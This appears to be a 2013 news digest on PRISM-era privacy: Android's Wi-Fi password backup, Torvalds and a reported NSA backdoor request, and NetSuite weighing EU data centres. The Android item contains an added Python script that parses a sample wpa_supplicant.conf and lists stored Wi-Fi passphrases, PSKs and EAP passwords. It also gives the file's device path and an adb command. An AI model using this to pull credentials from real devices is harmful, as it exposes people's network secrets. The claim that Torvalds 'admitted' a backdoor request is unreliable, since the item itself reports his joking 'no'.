The Facebook chief is one of many business leaders and politicians to point out the potential damage spying campaigns such as PRISM can do to countries' economies. Vice president of the European Commission and EU commissioner for justice Viviane Reding claimed that Europe's economy will suffer unless new uniform, cross-national data protection laws are created to prevent programmes such as PRISM from recurring.

Google has access to WiFi passwords stored in Android mobile devices

Google may have access to the WiFi passwords stored on its customers' Android devices, thanks to a built-in backup feature of the Android OS.

Google may know every WiFi password used by every Android user, which would expose an extraordinary amount of sensitive data. According to a post by Michael Horowitz on Computerworld, it is enough that an Android device with backup enabled has ever connected to a WiFi network.
Given the widespread adoption of Android, which accounted for a 79.3% market share in Q2 2013 according to International Data Corporation, Google is likely to hold most WiFi passwords worldwide. According to privacy advocates and security experts, the Android OS has a built-in feature for backing up mobile data, including WiFi passwords.
Users who have changed devices will have noticed the option to import their passwords, personal data, applications, device settings and login data; this works as long as they have set up a Gmail address and password on their phone. The data is sent to Google's servers over an encrypted connection and is restored only to a device authenticated to the same Google account. But the backup is not encrypted with a key that only the user holds, so Google itself can read the passwords it contains.
“Android devices have defaulted to coughing up WiFi passwords since version 2.2. And, since the feature is presented as a good thing, most people wouldn’t change it,” wrote Horowitz.
“The ‘back up my data’ option in Android is very convenient. However it means sending a lot of private information, including passwords, in plaintext to Google. This information is vulnerable to government requests for data,” wrote Micah Lee, staff technologist at privacy warrior outfit the Electronic Frontier Foundation.
Users can of course switch the backup feature off, but according to many privacy experts the functionality is not properly explained. A post published on The Register in particular highlighted the privacy risk of including WiFi passwords in the backup.
“The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user’s home, and include hotels, shops, libraries, friends’ houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents.”
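To make concrete what such a backup carries, here is an added Python example; it is not code from this article, from Horowitz's post or from Android itself. Android releases of that period kept saved Wi-Fi networks in /data/misc/wifi/wpa_supplicant.conf, and the Settings backup includes that file; the page does not name the file, so treat that as background supplied here. The script parses a constructed copy of such a file (the networks and secrets in it are invented) and lists every network for which a usable secret is stored, whether a WPA passphrase, a raw hex PSK or an enterprise EAP password.

```python
"""Inventory the Wi-Fi credentials an Android settings backup would carry.

Android releases of the 2.x-4.x era stored saved networks in
/data/misc/wifi/wpa_supplicant.conf, which the Settings backup agent
uploads when "Back up my data" is on. This example parses a constructed
copy of that file and reports which networks carry a recoverable secret.
"""
import re

# Constructed sample in wpa_supplicant.conf syntax; not taken from a real device.
SAMPLE_CONF = """\
ctrl_interface=/data/misc/wifi/sockets
update_config=1

network={
\tssid="HomeNet"
\tpsk="correct horse battery staple"
\tkey_mgmt=WPA-PSK
\tpriority=3
}

network={
\tssid="Hotel-Guest"
\tkey_mgmt=NONE
\tpriority=1
}

network={
\tssid="Office"
\tpsk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
\tkey_mgmt=WPA-PSK
}

network={
\tssid="CorpWiFi"
\tkey_mgmt=WPA-EAP IEEE8021X
\teap=PEAP
\tidentity="jdoe"
\tpassword="Summer2013!"
\tpriority=2
}
"""

_BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.DOTALL)
_KV_RE = re.compile(r"^\s*([A-Za-z0-9_]+)=(.*?)\s*$")


def parse_networks(conf_text):
    """Return one dict of key/value pairs per network={...} block.

    Double-quoted values are strings (ssid="x", psk="passphrase"); unquoted
    values are raw tokens (key_mgmt=WPA-PSK, psk=<64 hex chars>). Which keys
    were quoted is recorded under "_quoted" so a passphrase can be told
    apart from a pre-shared key that is already in hex form.
    """
    networks = []
    for block in _BLOCK_RE.finditer(conf_text):
        entry = {}
        for line in block.group(1).splitlines():
            m = _KV_RE.match(line)
            if not m:
                continue
            key, raw = m.groups()
            if len(raw) >= 2 and raw[0] == raw[-1] == '"':
                entry[key] = raw[1:-1]
                entry.setdefault("_quoted", set()).add(key)
            else:
                entry[key] = raw
        if "ssid" in entry:
            networks.append(entry)
    return networks


def classify_secret(net):
    """Describe the secret stored for one network, or None if there is none.

    psk="..."      -> the plaintext WPA passphrase
    psk=<hex>      -> the derived 256-bit PSK, which joins the network as-is
    password="..." -> the user's EAP (often corporate domain) password
    """
    quoted = net.get("_quoted", set())
    if "psk" in net:
        return "passphrase" if "psk" in quoted else "raw-psk-hex"
    if "password" in net:
        return "eap-password"
    return None


def exposed_networks(conf_text):
    """List (ssid, key_mgmt, secret-kind) for every network with a stored secret."""
    found = []
    for net in parse_networks(conf_text):
        kind = classify_secret(net)
        if kind is not None:
            found.append((net["ssid"], net.get("key_mgmt", "?"), kind))
    return found


if __name__ == "__main__":
    for ssid, mgmt, kind in exposed_networks(SAMPLE_CONF):
        print(f"{ssid:12s} {mgmt:20s} {kind}")
```

On a real device the file is readable only with root. Whether the backup is switched on can be checked from a connected computer with `adb shell bmgr enabled`, and the setting itself lives under Settings > Backup & reset > Back up my data; turning it off stops future uploads but, as the Computerworld post quoted in this article notes, does not remove copies Google already holds.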
Recent revelations about the PRISM surveillance programme and the collaboration “requested” by US authorities from IT giants such as Google have heightened users' privacy concerns; government interference in users' online lives has reached unprecedented levels.
“Even if Google deletes every copy of your backed up data, they may already have been compelled to share it with others. And, Google will continue to have a copy of the password until every Android device that has ever connected to the network turns off the backing up of settings/data,” states the Computerworld post, with explicit reference to the surveillance activities of intelligence agencies.
The news about the WiFi passwords “acquired” by Google came after Der Spiegel reported on the NSA's capability to access data stored on smartphones. Mobile devices have become an extension of our digital selves and therefore hold valuable information about both our online and offline lives.
In the digital era, surveillance and monitoring by governments and private companies are becoming pervasive practices that must be resisted; telling are the words of Google executive chairman Eric Schmidt on government spying: it is the “nature of our society.”

NSA tried to insert backdoor into Linux

Linus Torvalds, during the latest LinuxCon, admitted to having received pressure from US intelligence to insert a backdoor into Linux.

During a question-and-answer session at LinuxCon, Linus Torvalds publicly admitted that the US government had asked him to insert a backdoor into the Linux kernel. The episode should give pause to those experts who believe open source software is by itself a sufficient answer to surveillance programmes such as PRISM and BULLRUN.
Torvalds, regarded as the father of the Linux kernel, attended LinuxCon in New Orleans today with other top Linux developers and answered questions on his OS, on Microsoft and on other issues related to the events of recent months.


The audience was amused by Torvalds' answer to the specific question of whether US intelligence had asked him for a backdoor: he said “no” while nodding his head “yes”. Another participant asked Torvalds whether he would be interested in becoming Microsoft's next CEO; he declined the idea with a smile, remarking that the development of Linux completely absorbs him.
He spoke of the technological evolution since he started designing Linux two decades ago: hardware platforms have changed profoundly and will change even more in the near future.
“Linux usage keeps changing. Linux today is very different from even ten years ago,” said Torvalds. “I hope it will continue to meet new use cases.”
Torvalds also told an interesting anecdote: when he started, he did not have the money to run Unix on his own machine, so he had to learn programming to create his own cheap system.
“Necessity made me try to do something,” Torvalds said.

NetSuite considers European data centres as EU privacy concerns mount

SAN FRANCISCO: A heightened need for privacy in cloud computing services has had some effect on the activities of US-based cloud providers, with NetSuite "seriously considering" creating EU-based data centres to appease customer concerns. Meanwhile, Box says it hasn't seen any impact whatsoever on its European customer base.
Speaking on a panel at Box's annual BoxWorks conference, NetSuite's CTO and chairman Evan Goldberg said: "All of our data centres are in North America right now and we're starting to see the privacy issue kind of having an impact in so far on sales figures. So European servers are something we're seriously considering." He added that customers in countries such as Germany – where data privacy rules are very strict – were looking for servers at the very least based in the EU, if not in Germany.
Goldberg's comments match EU rhetoric, with European Commission vice president Neelie Kroes saying in July that the NSA PRISM surveillance scandal – which suggested the government was granted back-door access to major internet services – would have an impact on US cloud providers.
"Front or back door, it doesn't matter. Any smart person doesn't want the information shared at all," she said. "Customers will act rationally, and providers will miss out on a great opportunity. In this case it is often American providers that will miss out, because they are often the leaders in cloud services."
Cloud collaboration firm Box, however, told V3 that it had not felt this at all, with the firm's senior vice president of engineering Sam Schillace saying that Kroes' speech was "hyperbole". He added: "European governments aren't any better – in some cases they're worse than the US government in their ability to reach in and look at user data."
Meanwhile, Box co-founder Dylan Smith said in an interview with V3 that the heightened need for security had actually favoured his company. "As security becomes more important, it actually favours us." He added that he had not yet seen Kroes' claims materialise.